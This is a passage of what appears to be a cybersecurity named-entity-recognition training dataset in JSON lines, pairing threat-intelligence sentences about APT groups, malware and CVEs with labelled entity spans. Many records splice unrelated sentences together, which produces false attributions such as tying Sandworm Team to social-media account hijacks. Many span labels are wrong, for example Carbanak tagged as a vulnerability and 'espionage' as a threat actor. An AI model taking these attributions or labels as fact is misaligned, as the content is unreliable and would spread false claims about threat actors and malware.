For example , Registry keys and other configuration settings can be used to modify protocol and port pairings.[3 ] APT - C-36 has used port 4050 for C2 communications.[4 ]", "spans": {"TOOL: Lamberts": [[157, 165]], "TOOL: Regin": [[201, 206]], "TOOL: ProjectSauron": [[209, 222]], "TOOL: Equation": [[225, 233]], "TOOL: Duqu2": [[238, 243]], "THREAT_ACTOR: APT12": [[500, 505]], "ORGANIZATION: New York Times": [[552, 566]], "THREAT_ACTOR: APT - C-36": [[696, 706]]}, "info": {"id": "cyberner_stix_train_001693", "source": "cyberner_stix_train"}} {"text": "This image file exists on the third page of the document , so the user would have to scroll down in the document to this third page to get the SWF file to run .", "spans": {"TOOL: SWF": [[143, 146]]}, "info": {"id": "cyberner_stix_train_001694", "source": "cyberner_stix_train"}} {"text": "Our research demonstrates the efforts used by attackers to reduce the risk of detection of the Spark backdoor by various security products .", "spans": {"MALWARE: Spark backdoor": [[95, 109]]}, "info": {"id": "cyberner_stix_train_001695", "source": "cyberner_stix_train"}} {"text": "This library is used because it uses the only ( publicly known ) way to retrieve this information on Android 6 ( using the process OOM score read from the /proc directory ) . Kaspersky Lab also found some watering hole attacks , including one on a website belonging to a prominent member of the Japanese government . The incident , as described by security researchers with Moscow-based cybersecurity firm Kaspersky Lab , shines a rare light on the opaque although apparently vibrant market for software exploits and spyware , which in this case appears to have been purchased by a nation-state . 
Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis / parsing of network data .", "spans": {"SYSTEM: Android 6": [[101, 110]], "ORGANIZATION: Kaspersky Lab": [[175, 188], [406, 419]], "MALWARE: spyware": [[517, 524]], "THREAT_ACTOR: Adversaries": [[597, 608]]}, "info": {"id": "cyberner_stix_train_001696", "source": "cyberner_stix_train"}} {"text": "The ORat tool , which appears to be used less frequently by the group , communicates over TCP port 80 using a raw socket protocol ( not HTTP ) .", "spans": {"MALWARE: ORat": [[4, 8]]}, "info": {"id": "cyberner_stix_train_001697", "source": "cyberner_stix_train"}} {"text": "The aggressive nature of Sandworm Team 's previous activity in Europe and the United States exposed their interest in targeting critical systems and indicated preparation for cyber attack . The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": {"THREAT_ACTOR: Sandworm Team": [[25, 38]], "ORGANIZATION: WikiLeaks'": [[230, 240]], "ORGANIZATION: Twitter": [[292, 299], [356, 363]], "ORGANIZATION: Mark Zuckerberg": [[337, 352]], "ORGANIZATION: Pinterest": [[368, 377]], "ORGANIZATION: BuzzFeed": [[407, 415]], "ORGANIZATION: TechCrunch": [[420, 430]]}, "info": {"id": "cyberner_stix_train_001698", "source": "cyberner_stix_train"}} {"text": "Unit 42 analyzed the use of these six malware families and found that Nigerian actors are currently producing an average of 146 unique samples of malware per month ( see Figure 6 ) . 
Turla is a notorious group that has been targeting government officials .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: actors": [[79, 85]], "THREAT_ACTOR: Turla": [[183, 188]], "ORGANIZATION: government officials": [[234, 254]]}, "info": {"id": "cyberner_stix_train_001699", "source": "cyberner_stix_train"}} {"text": "Utilizing Diamond Model methodology for characterizing activity by behaviors attached to victims , we began tracking TRITON / TRISIS and immediate enabling activity as a distinct activity group ( collection of behaviors , infrastructure , and victimology ) designated XENOTIME .", "spans": {"TOOL: Diamond Model": [[10, 23]], "MALWARE: TRITON": [[117, 123]], "MALWARE: TRISIS": [[126, 132]], "THREAT_ACTOR: XENOTIME": [[268, 276]]}, "info": {"id": "cyberner_stix_train_001700", "source": "cyberner_stix_train"}} {"text": "The third timer will fire every 10 seconds and will attempt to register the device into the C2 and register wake-up locks on the system to control the device 's status . Once they have found a victim , they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files . 
The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": {"THREAT_ACTOR: they": [[175, 179]], "TOOL: (RMS)": [[255, 260]], "ORGANIZATION: defectors": [[394, 403]]}, "info": {"id": "cyberner_stix_train_001701", "source": "cyberner_stix_train"}} {"text": "88034e0eddfdb6297670d28ed810aef87679e9492e9b3e782cc14d9d1a55db84 e08f08f4fa75609731c6dd597dc55c8f95dbdd5725a6a90a9f80134832a07f2e 01c5b637f283697350ca361f241416303ab6123da4c6726a6555ac36cb654b5c 1fb06666befd581019af509951320c7e8535e5b38ad058069f4979e9a21c7e1c This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . Rancor : 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d . Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": {"MALWARE: bait document": [[265, 278]], "MALWARE: Word document": [[328, 341]], "VULNERABILITY: CVE-2012-0158": [[362, 375]], "THREAT_ACTOR: Rancor": [[533, 539]], "FILEPATH: 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d": [[542, 606]], "MALWARE: COSMICENERGY": [[621, 633]]}, "info": {"id": "cyberner_stix_train_001702", "source": "cyberner_stix_train"}} {"text": "FakeSpy has been in the wild since 2017 ; this latest campaign indicates that it has become more powerful . \bSince at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . 
Gallmaker may well have continued to avoid detection were it not for Symantec 's technology .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: group": [[150, 155]], "ORGANIZATION: FireEye": [[161, 168]], "THREAT_ACTOR: APT33": [[179, 184]], "ORGANIZATION: defense": [[257, 264]], "ORGANIZATION: aerospace": [[267, 276]], "ORGANIZATION: petrochemical": [[281, 294]], "THREAT_ACTOR: Gallmaker": [[311, 320]], "ORGANIZATION: Symantec": [[380, 388]]}, "info": {"id": "cyberner_stix_train_001703", "source": "cyberner_stix_train"}} {"text": "Infrastructure At the time of writing the following domains have either been used by this family or are currently active . One possible hit was triggered when we observed Mevade , an unusual piece of malware that appeared late in 2013 . In these instances , when a victim backdoor makes contact with a hop , the communications need to be forwarded from the hop to the intruder ’s Shanghai system so the backdoor can talk to the C2 server software . Greatness offers the ability for users to bypass targets ’ multi - factor authentication protections , IP filtering and integration with Telegram bots .", "spans": {"TOOL: C2": [[428, 430]], "TOOL: Greatness": [[449, 458]]}, "info": {"id": "cyberner_stix_train_001704", "source": "cyberner_stix_train"}} {"text": "Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents . 
Prior to the distribution of new versions of the agent , the Infy developers appear to consistently conduct tests from local hosts , which indicates that the control and maintenance of the software occurs in the Khorasan Razavi province of Iran , potentially in the city of Mashhad .", "spans": {"THREAT_ACTOR: APT32": [[22, 27]], "THREAT_ACTOR: OceanLotus Group": [[48, 64]], "ORGANIZATION: foreign corporations": [[80, 100]], "ORGANIZATION: foreign governments": [[131, 150]], "ORGANIZATION: journalists": [[153, 164]], "ORGANIZATION: dissidents": [[182, 192]], "MALWARE: Infy": [[256, 260]]}, "info": {"id": "cyberner_stix_train_001705", "source": "cyberner_stix_train"}} {"text": "The archive contains two files ; the first is an executable file , while the second is a decoy PDF document .", "spans": {"TOOL: PDF": [[95, 98]]}, "info": {"id": "cyberner_stix_train_001706", "source": "cyberner_stix_train"}} {"text": "‘ SimBad ’ comes with a respected list of capabilities on the user ’ s device , such as removing the icon from the launcher , thus making it harder for the user to uninstall , start to display background ads and open a browser with a given URL . In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts . Suckfly conducted a multistage attack against an e-commerce organization .", "spans": {"MALWARE: SimBad": [[2, 8]], "THREAT_ACTOR: attackers": [[266, 275]], "TOOL: Worldwide Interbank Financial Telecommunication": [[297, 344]], "TOOL: SWIFT": [[347, 352]], "ORGANIZATION: e-commerce organization": [[450, 473]]}, "info": {"id": "cyberner_stix_train_001707", "source": "cyberner_stix_train"}} {"text": "Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . 
Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "TOOL: Carberp": [[51, 58]], "THREAT_ACTOR: espionage": [[76, 85]], "ORGANIZATION: Kaspersky Lab": [[173, 186], [314, 327]], "VULNERABILITY: zero-day": [[252, 260]]}, "info": {"id": "cyberner_stix_train_001708", "source": "cyberner_stix_train"}} {"text": "Quasar is a .NET Framework-based open-source RAT .", "spans": {"MALWARE: Quasar": [[0, 6]], "TOOL: .NET": [[12, 16]], "TOOL: RAT": [[45, 48]]}, "info": {"id": "cyberner_stix_train_001709", "source": "cyberner_stix_train"}} {"text": "BRONZE PRESIDENT 's C2 techniques are dictated by its remote access tools .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]], "TOOL: C2": [[20, 22]]}, "info": {"id": "cyberner_stix_train_001710", "source": "cyberner_stix_train"}} {"text": "Access to an individual's personal or corporate email account provides a substantial amount of useful intelligence , and threat actors could also leverage the access to launch additional attacks to penetrate the network of an associated organization .", "spans": {"TOOL: email": [[48, 53]]}, "info": {"id": "cyberner_stix_train_001711", "source": "cyberner_stix_train"}} {"text": "As a result of our ongoing efforts , we identified significant changes to the group ’s attack methodology .", "spans": {}, "info": {"id": "cyberner_stix_train_001712", "source": "cyberner_stix_train"}} {"text": "Figure 20 : dropper app category distribution Among the vast number of variants , the top 5 most infectious droppers alone have been downloaded more than 7.8 million times of the infection operations against innocent applications : Figure 21 : Top 5 most infectious droppers The “ Agent Smith ” campaign is primarily targeted at Indian users , who represent 59 % of the impacted population . 
The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents . exe , a password-protected ZIP file , and a batch file that checks for currently installed antivirus products . This activity suggested exploitation of CVE-2021 - 26858 .", "spans": {"MALWARE: Agent Smith": [[281, 292]], "MALWARE: decoy documents": [[396, 411]], "ORGANIZATION: politically": [[462, 473]], "ORGANIZATION: militarily": [[477, 487]], "ORGANIZATION: political": [[547, 556]], "FILEPATH: exe": [[599, 602]], "VULNERABILITY: CVE-2021 - 26858": [[751, 767]]}, "info": {"id": "cyberner_stix_train_001713", "source": "cyberner_stix_train"}} {"text": "TG-3390 conducts SWCs or sends spearphishing emails with ZIP archive attachments .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "SYSTEM: SWCs": [[17, 21]], "TOOL: emails": [[45, 51]], "TOOL: ZIP": [[57, 60]]}, "info": {"id": "cyberner_stix_train_001714", "source": "cyberner_stix_train"}} {"text": "Potential targets The actors behind FrozenCell used an online service that geolocates mobile devices based on nearby cell towers to track targets . When the New York Times and Mandiant last year unmasked a large scale Chinese hacking operation , pinpointing its location down to the building , the report drew mainstream attention to what security professionals already well knew : sophisticated threat actors carry out persistent cyber operations over months and years . To help manage the vast number of systems they control , APT1 has registered hundreds of domain names , the majority of which also point to a Shanghai locale . 
But other bad actors have since adopted this businesses model , offering every from command and control servers to phishing bots - as - a - service .", "spans": {"MALWARE: FrozenCell": [[36, 46]], "ORGANIZATION: New York Times": [[157, 171]], "ORGANIZATION: Mandiant": [[176, 184]], "THREAT_ACTOR: APT1": [[529, 533]], "THREAT_ACTOR: bad actors": [[642, 652]], "SYSTEM: command and control servers": [[716, 743]], "THREAT_ACTOR: phishing bots - as - a - service": [[747, 779]]}, "info": {"id": "cyberner_stix_train_001715", "source": "cyberner_stix_train"}} {"text": "In October 2019 , third-party researchers described a phishing campaign that used C2 infrastructure that CTU researchers attribute to BRONZE PRESIDENT .", "spans": {"TOOL: C2": [[82, 84]], "ORGANIZATION: CTU": [[105, 108]], "THREAT_ACTOR: BRONZE PRESIDENT": [[134, 150]]}, "info": {"id": "cyberner_stix_train_001716", "source": "cyberner_stix_train"}} {"text": "In particular , we identified advanced methods consistent with nation-state level capabilities including deliberate targeting and ‘ access management ’ tradecraft – both groups were constantly going back into the environment to change out their implants , modify persistent methods , move to new Command & Control channels and perform other tasks to try to stay ahead of being detected .", "spans": {"TOOL: Command & Control": [[296, 313]]}, "info": {"id": "cyberner_stix_train_001717", "source": "cyberner_stix_train"}} {"text": "Several days ago , the e-mail account of a high-profile Tibetan activist was hacked and used to send targeted attacks to other activists and human rights advocates . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . 
The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia .", "spans": {"THREAT_ACTOR: APT34": [[185, 190]], "VULNERABILITY: Microsoft Office vulnerability": [[205, 235]], "VULNERABILITY: CVE-2017-11882": [[236, 250]], "TOOL: POWRUNER": [[261, 269]], "TOOL: BONDUPDATER": [[274, 285]], "ORGANIZATION: Microsoft": [[309, 318]], "ORGANIZATION: oil and gas": [[340, 351]], "MALWARE: greensky27.vicp.net": [[401, 420]], "THREAT_ACTOR: Naikon": [[444, 450]], "ORGANIZATION: energy resources": [[546, 562]]}, "info": {"id": "cyberner_stix_train_001718", "source": "cyberner_stix_train"}} {"text": "DLL side loading has been used to maintain persistence on the compromised system .", "spans": {"TOOL: DLL": [[0, 3]]}, "info": {"id": "cyberner_stix_train_001719", "source": "cyberner_stix_train"}} {"text": "ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . 
We believe that the IP addresses from Canada , Russia and NorACT are analysis systems of antivirus companies or security researchers .", "spans": {"MALWARE: ChopShop1": [[0, 9]], "ORGANIZATION: MITRE Corporation": [[46, 63]], "ORGANIZATION: antivirus companies": [[304, 323]]}, "info": {"id": "cyberner_stix_train_001720", "source": "cyberner_stix_train"}} {"text": "These spear-phishing emails would contain links that eventually lead the victim to becoming infected with CozyDuke .", "spans": {"TOOL: emails": [[21, 27]], "MALWARE: CozyDuke": [[106, 114]]}, "info": {"id": "cyberner_stix_train_001721", "source": "cyberner_stix_train"}} {"text": "They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage . However , the attack is different in two respects : unlike other APTs , the main focus of Blue Termite is to attack Japanese organizations ; and most of their C2s are located in Japan .", "spans": {"MALWARE: They": [[0, 4]], "MALWARE: Blue Termite": [[238, 250]]}, "info": {"id": "cyberner_stix_train_001722", "source": "cyberner_stix_train"}} {"text": "As a countermeasure , financial institutions introduced various second factor authentication ( 2FA ) methods . Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia . 
The samples of ThreeDollars we collected in these attacks are structurally very similar to the first sample we analyzed in October 2017 , down to the lure image used to trick the recipient into clicking the \" Enable Content \" button to execute the malicious macro .", "spans": {"THREAT_ACTOR: groups": [[117, 123]], "THREAT_ACTOR: Buhtrap": [[134, 141]], "THREAT_ACTOR: Corkow": [[144, 150]], "THREAT_ACTOR: Carbanak": [[155, 163]], "ORGANIZATION: financial institutions": [[229, 251]], "ORGANIZATION: customers": [[262, 271]], "MALWARE: ThreeDollars": [[299, 311]]}, "info": {"id": "cyberner_stix_train_001723", "source": "cyberner_stix_train"}} {"text": "The family was suspected to be developed by the Iron cybercrime group and it's also associated with the Xbash malware we reported on in September of 2018 . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit .", "spans": {"TOOL: Xbash malware": [[104, 117]], "THREAT_ACTOR: Wild Neutron": [[156, 168]], "MALWARE: stolen code signing certificate": [[195, 226]], "ORGANIZATION: electronics": [[250, 261]], "TOOL: Flash Player": [[288, 300]], "VULNERABILITY: exploit": [[301, 308]]}, "info": {"id": "cyberner_stix_train_001724", "source": "cyberner_stix_train"}} {"text": "One in five notifications of STRONTIUM activity were tied to attacks against non-governmental organizations , think tanks , or politically affiliated organizations around the world .", "spans": {"THREAT_ACTOR: STRONTIUM": [[29, 38]]}, "info": {"id": "cyberner_stix_train_001725", "source": "cyberner_stix_train"}} {"text": "APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . 
Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "VULNERABILITY: EternalBlue exploit": [[46, 65]], "TOOL: open source tool": [[74, 90]], "TOOL: Responder": [[91, 100]], "VULNERABILITY: zero-day": [[196, 204]], "TOOL: Flash": [[222, 227]]}, "info": {"id": "cyberner_stix_train_001726", "source": "cyberner_stix_train"}} {"text": "The more complex the obfuscation , the longer it will take an antivirus solution to neutralize the malicious code . Designated as Threat Group 3390 and nicknamed \" Emissary Panda \" by researchers , the hacking group has compromised victims' networks largely through \" watering hole \" attacks launched from over 100 compromised legitimate websites , sites picked because they were known to be frequented by those targeted in the attack . The part of the code that is patched is located at the very beginning of the main function of hpqhvind.exe . 
Once a system was exploited a unique downloader was dropped onto the victim ’s disk , containing a customized micro backdoor written in Assembler .", "spans": {"THREAT_ACTOR: Threat Group 3390": [[130, 147]], "THREAT_ACTOR: Emissary Panda": [[164, 178]], "FILEPATH: hpqhvind.exe": [[531, 543]], "TOOL: Assembler": [[682, 691]]}, "info": {"id": "cyberner_stix_train_001727", "source": "cyberner_stix_train"}} {"text": "XLoader can also load multiple malicious modules to receive and execute commands from its remote command-and-control ( C & C ) server , as shown below : Here ’ s a list of the modules and their functions : sendSms — send SMS/MMS to a specified address setWifi — enable or disable Wi-Fi connection gcont — collect all the device ’ s contacts lock — currently just an input lock status in the settings ( pref ) file , but may be used as a screenlocking ransomware bc — collect all contacts Lazarus is a very active attack group involved in both cyber crime and espionage . The comparison of the infection chains reveals in both cases the attacker used a couple of SFX stages to deploy the “ RMS ” software : a legitimate remote administration tool produced by the Russian company “ TektonIT ” .", "spans": {"MALWARE: XLoader": [[0, 7]], "THREAT_ACTOR: Lazarus": [[488, 495]], "TOOL: SFX": [[662, 665]], "TOOL: RMS": [[689, 692]], "TOOL: TektonIT": [[780, 788]]}, "info": {"id": "cyberner_stix_train_001728", "source": "cyberner_stix_train"}} {"text": "Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . 
According to our estimations , this group has been active for several years and specializes in cyberattacks against the online video game industry .", "spans": {"ORGANIZATION: Microsoft": [[23, 32]], "VULNERABILITY: CVE-2017-11882": [[52, 66]], "ORGANIZATION: FireEye": [[87, 94]], "THREAT_ACTOR: attacker": [[107, 115]], "VULNERABILITY: Microsoft Office vulnerability": [[141, 171]], "ORGANIZATION: government organization": [[184, 207]], "ORGANIZATION: online video game industry": [[349, 375]]}, "info": {"id": "cyberner_stix_train_001729", "source": "cyberner_stix_train"}} {"text": "However , a coincidence seems unlikely , and CTU researchers suspect that TG-4127 used the spearphishing emails or similar techniques to gain an initial foothold in the DNC network .", "spans": {"ORGANIZATION: CTU": [[45, 48]], "THREAT_ACTOR: TG-4127": [[74, 81]], "TOOL: emails": [[105, 111]], "ORGANIZATION: DNC": [[169, 172]]}, "info": {"id": "cyberner_stix_train_001730", "source": "cyberner_stix_train"}} {"text": "Although this file itself is not particularly interesting , the older ( native ) Downeks versions also creates a file in Appdata\\Roaming , with identical data .", "spans": {"MALWARE: Downeks": [[81, 88]], "TOOL: Appdata\\Roaming": [[121, 136]]}, "info": {"id": "cyberner_stix_train_001731", "source": "cyberner_stix_train"}} {"text": "There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks .", "spans": {"THREAT_ACTOR: Suckfly": [[26, 33]]}, "info": {"id": "cyberner_stix_train_001732", "source": "cyberner_stix_train"}} {"text": "] com http : //www.i4vip [ . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . 
The Seedworm group is the only group known to use the Powermud backdoor .", "spans": {"VULNERABILITY: Carbanak": [[61, 69]], "VULNERABILITY: CVE-2013-3660": [[238, 251]], "THREAT_ACTOR: Seedworm group": [[291, 305]], "MALWARE: Powermud backdoor": [[341, 358]]}, "info": {"id": "cyberner_stix_train_001733", "source": "cyberner_stix_train"}} {"text": "UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity .", "spans": {"MALWARE: UMBRAGE": [[0, 7]], "VULNERABILITY: exploit": [[273, 280]], "VULNERABILITY: CVE-2017-1182": [[281, 294]], "FILEPATH: Microsoft Equation Editor": [[312, 337]], "FILEPATH: 'EQNEDT32.exe'": [[340, 354]]}, "info": {"id": "cyberner_stix_train_001734", "source": "cyberner_stix_train"}} {"text": "From the 185.25.50.93 C2 IP , we discovered another hard-coded user agent being used by Zebrocy :", "spans": {"IP_ADDRESS: 185.25.50.93": [[9, 21]], "TOOL: C2": [[22, 24]], "MALWARE: Zebrocy": [[88, 95]]}, "info": {"id": "cyberner_stix_train_001735", "source": "cyberner_stix_train"}} {"text": "From where we sit , 2017 Sofacy activity starts with a heavy focus on NATO and Ukrainian partners , coinciding with lighter interest in Central Asian targets , and finishing the second half of the year with a heavy focus on Central Asian targets and some shift further East .", "spans": {"THREAT_ACTOR: Sofacy": [[25, 31]], "ORGANIZATION: NATO": [[70, 74]]}, "info": {"id": "cyberner_stix_train_001736", "source": "cyberner_stix_train"}} {"text": "It is clear that on all stages there are at least two layers . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . 
Looks for a Windows pipe named \\\\.\\pipe\\_kernel32.dll.ntdll.dll.user32.dll . The new documentary , The Ashley Madison Affair , begins airing today on Hulu in the United States and on Disney+ in the United Kingdom .", "spans": {"ORGANIZATION: Trend Micro": [[77, 88]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[122, 141]], "SYSTEM: Windows": [[195, 202]], "FILEPATH: \\\\.\\pipe\\_kernel32.dll.ntdll.dll.user32.dll": [[214, 257]], "ORGANIZATION: The Ashley Madison Affair": [[282, 307]], "ORGANIZATION: Hulu": [[333, 337]], "ORGANIZATION: Disney+": [[366, 373]]}, "info": {"id": "cyberner_stix_train_001737", "source": "cyberner_stix_train"}} {"text": "The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors .", "spans": {"MALWARE: archive": [[14, 21]], "VULNERABILITY: vulnerability": [[82, 95]], "FILEPATH: documents": [[137, 146]], "VULNERABILITY: CVE-2012-0158": [[230, 243]], "TOOL: Microsoft Word": [[299, 313]], "VULNERABILITY: vulnerabilities": [[314, 329]]}, "info": {"id": "cyberner_stix_train_001738", "source": "cyberner_stix_train"}} {"text": "Version # 2 : June - Aug. 2019 — Domain : somtum [ . Cadelle , uses Backdoor.Cadelspy . FireEye researchers discovered two possibly related campaigns utilizing two other backdoors known as THREEBYTE and WATERSPOUT . 
APT33 has used HTTP over TCP ports 808 and 880 for command and control.[1 ]", "spans": {"TOOL: Backdoor.Cadelspy": [[68, 85]], "ORGANIZATION: FireEye": [[88, 95]], "MALWARE: THREEBYTE": [[189, 198]], "MALWARE: WATERSPOUT": [[203, 213]], "THREAT_ACTOR: APT33": [[216, 221]]}, "info": {"id": "cyberner_stix_train_001739", "source": "cyberner_stix_train"}} {"text": "We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information . They have different functions and ACTs of spreading , but the same purpose — to steal money from the accounts of businesses .", "spans": {"TOOL: Bookworm samples": [[16, 32]], "ORGANIZATION: businesses": [[310, 320]]}, "info": {"id": "cyberner_stix_train_001740", "source": "cyberner_stix_train"}} {"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft .", "spans": {"THREAT_ACTOR: Patchwork": [[10, 19]], "MALWARE: MS PowerPoint document": [[28, 50]], "VULNERABILITY: CVE-2014-6352": [[76, 89]], "THREAT_ACTOR: Leafminer": [[92, 101]], "VULNERABILITY: exploit": [[116, 123]], "TOOL: SMB": [[216, 219]], "VULNERABILITY: vulnerabilities": [[220, 235]], "ORGANIZATION: Microsoft": [[249, 258]]}, "info": {"id": "cyberner_stix_train_001741", "source": "cyberner_stix_train"}} {"text": "Pin request overlay This overlay asks the user to provide their PIN to unlock the mobile device , which is immediately exfiltrated to the C2 . Entities in these sectors are often \" enabling victims \" as telecommunications providers or IT services agencies and vendors could provide Seedworm actors with further victims to compromise . Derusbi : SHA256 : 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab . 
These individuals are targeting companies due to a difference in values .", "spans": {"ORGANIZATION: telecommunications providers": [[203, 231]], "ORGANIZATION: IT services agencies": [[235, 255]], "THREAT_ACTOR: Seedworm actors": [[282, 297]], "MALWARE: Derusbi": [[335, 342]], "FILEPATH: 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab": [[354, 413]]}, "info": {"id": "cyberner_stix_train_001742", "source": "cyberner_stix_train"}} {"text": "Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL .", "spans": {"MALWARE: attachment": [[35, 45]], "TOOL: NetTraveler": [[79, 90]], "MALWARE: DLL side-loading": [[99, 115]], "TOOL: DLL": [[159, 162], [476, 479]], "MALWARE: Visma": [[201, 206]], "THREAT_ACTOR: APT10": [[263, 268]], "MALWARE: 1.bat": [[304, 309]], "MALWARE: cu.exe": [[312, 318]], "MALWARE: ss.rar": [[321, 327]], "MALWARE: r.exe": [[330, 335]], "MALWARE: pd.exe": [[338, 344]], "ORGANIZATION: Rapid7": [[368, 374]], "FILEPATH: gup.exe": [[417, 424]], "FILEPATH: ANEL": [[562, 566]]}, "info": {"id": "cyberner_stix_train_001743", "source": "cyberner_stix_train"}} {"text": "In this blog , we look at the Winnti malware implant as used by two known activity groups BARIUM and LEAD .", "spans": {"MALWARE: Winnti": [[30, 36]], "THREAT_ACTOR: BARIUM": [[90, 96]], "THREAT_ACTOR: LEAD": [[101, 105]]}, "info": {"id": "cyberner_stix_train_001744", "source": "cyberner_stix_train"}} {"text": "The other overlapping files are tools used by the adversary to locate 
other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier .", "spans": {"MALWARE: etool.exe": [[99, 108]], "VULNERABILITY: CVE-2017-0144": [[150, 163]], "MALWARE: MS07-010": [[189, 197]], "MALWARE: checker1.exe": [[198, 210]], "MALWARE: PsExec": [[295, 301]], "MALWARE: psexec.exe": [[322, 332]], "FILEPATH: date string hardcoded": [[361, 382]], "MALWARE: Bookworm sample": [[393, 408]]}, "info": {"id": "cyberner_stix_train_001745", "source": "cyberner_stix_train"}} {"text": "In addition to the feature base it already possesses and the money that can be made from the rental , it could evolve to compete with the mightiest Android banking Trojans . Spam emails and attachments written in Chinese were found in May , and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications , international schools and manufacturing . 
While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": {"SYSTEM: Android": [[148, 155]], "THREAT_ACTOR: SectorJ04": [[249, 258]], "ORGANIZATION: electronics": [[314, 325]], "ORGANIZATION: telecommunications": [[330, 348]], "ORGANIZATION: international": [[351, 364]], "ORGANIZATION: manufacturing": [[377, 390]], "ORGANIZATION: Secureworks": [[432, 443]], "THREAT_ACTOR: BRONZE BUTLER": [[455, 468]], "VULNERABILITY: CVE-2016-7836": [[535, 548]]}, "info": {"id": "cyberner_stix_train_001746", "source": "cyberner_stix_train"}} {"text": "People who want to know if their Android devices are infected can download the Check Point app here . While the capabilities for the installers , loaders , and uninstallers in this report are relatively straight forward and single-focused , analysis of these malware families provide further insight into the capabilities of the Lazarus Group . Pupy RAT ( Backdoor.Patpoopy ) : Commodity RAT that can open a backdoor on an infected computer . 
